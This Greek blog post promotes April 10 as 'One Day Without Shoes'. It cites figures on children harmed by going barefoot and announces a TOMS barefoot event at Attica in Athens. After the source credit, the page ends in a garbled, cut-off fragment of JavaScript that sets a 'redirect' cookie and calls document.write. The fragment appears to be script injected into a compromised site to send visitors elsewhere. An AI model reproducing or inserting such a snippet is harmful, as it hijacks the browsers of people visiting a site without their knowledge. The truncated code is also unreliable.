10 Απριλίου: Μια ημέρα χωρίς παπούτσια

Ένα ζευγάρι παπούτσια μπορεί να αλλάξει μια ολόκληρη ζωή. Αν σας το έλεγαν θα το πιστεύατε;

Η 10η Απριλίου έχει οριστεί ως η παγκόσμια ημέρα χωρίς παπούτσια και σκοπό έχει να ευαισθητοποιήσει τον κόσμο για την σημασία των παπουτσιών στη βελτίωση της ζωής των φτωχών παιδιών.

Σε όλο τον κόσμο αυτή την ημέρα διοργανώνονται ποικίλες εκδηλώσεις, μικρές ή μεγάλες, πολύωρες και μη, από ανθρώπους οι οποίοι είναι ξυπόλυτοι επισημαίνοντας τοιουτοτρόπως την σημασία των παπουτσιών. Χαρακτηριστικά, το 2011 250,000 άνθρωποι σε όλο τον κόσμο έβγαλαν τα παπούτσια τους για το One Day Without Shoes σε πάνω από 1.000 εκδηλώσεις ενώ ο Lenny Kravitz, η Charlize Τheron, η Demi Moore, ο Jay Leno, η Heather Graham, η Donna Karan, η Arianna Huffington και η Tory Burch υποστηρίζουν την προσπάθεια αυτή.

Γιατί τα παπούτσια; Γιατί εκατομμύρια παιδιά διατρέχουν τον κίνδυνο να τραυματιστούν και να μολυνθούν από αρρώστιες μεταδιδόμενες από το έδαφος, γιατί υπάρχουν χώρες στις οποίες τα παπούτσια είναι απαραίτητα για να μπορούν τα παιδιά να πάνε σχολείο, γιατί τα παιδιά που είναι καλά στην υγεία τους έχουν περισσότερες πιθανότητες να καταφέρουν να είναι καλοί μαθητές.

Για να τεκμηριώσουμε όσα λέμε ας ρίξουμε μια ματιά σε μερικούς αριθμούς από τα στοιχεία του 2011 που… μιλούν από μόνοι τους:

– 30,000 άνθρωποι ζουν περιορισμένοι σε μία περιοχή στις Φιλιππίνες όπου τα παιδιά περπατάνε επάνω σε σπασμένα γυαλιά, σύριγγες και συντρίμμια καθημερινά.(ASIAN DEVLOPMENT BANK)

– 4,000,000 άνθρωποι υποφέρουν από podoconiosis, μία νόσο που βλάπτει και παραμορφώνει τα πόδια και προκαλείτε από την επαφή με το ενεργό ηφαιστειογενές έδαφος. (G.DAVEY)

– 1,890,000 παιδιά στην Κένυα έχουν μολυνθεί από ψύλλους και άλλα παράσιτα που προκαλούν επώδυνες βλάβες. (AHADI KENYA TRUST)

– 740,000,000
άνθρωποι έχουν μολυνθεί από ένα παράσιτο μεταδιδόμενο από το έδαφος που προκαλεί εντερικό πόνο, αδυναμία και γνωστική δυσλειτουργία. (ΠΑΓΚΟΣΜΙΟΣ ΟΡΓΑΝΙΣΜΟΣ ΥΓΕΙΑΣ (WHO)

Η TOMS σε συνεργασία με το Attica σας προσκαλούν να βγάλετε και εσείς τα παπούτσια σας στα πλαίσια της One Day Without Shoes στις 10 Απριλίου στις 18.00. Οι ξυπόλυτες Athens Swing Catsα θα μας εντυπωσιάσουν με τα ακροβατικά εν-aerials μυώντας μας στον κόσμο του swing, ενώ η Βίκυ Καγιά και οι μαθητές του Fashion Workshop θα βγάλουν τα παπούτσια τους!

Μην ξεχνάτε ότι για κάθε ζευγάρι που αγοράζετε, η TOMS χαρίζει ένα ζευγάρι καινούρια παπούτσια σε ένα παιδί που τα έχει ανάγκη. One for One.

Πηγή: missbloom.gr
t;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

You may also like...

Leave a Reply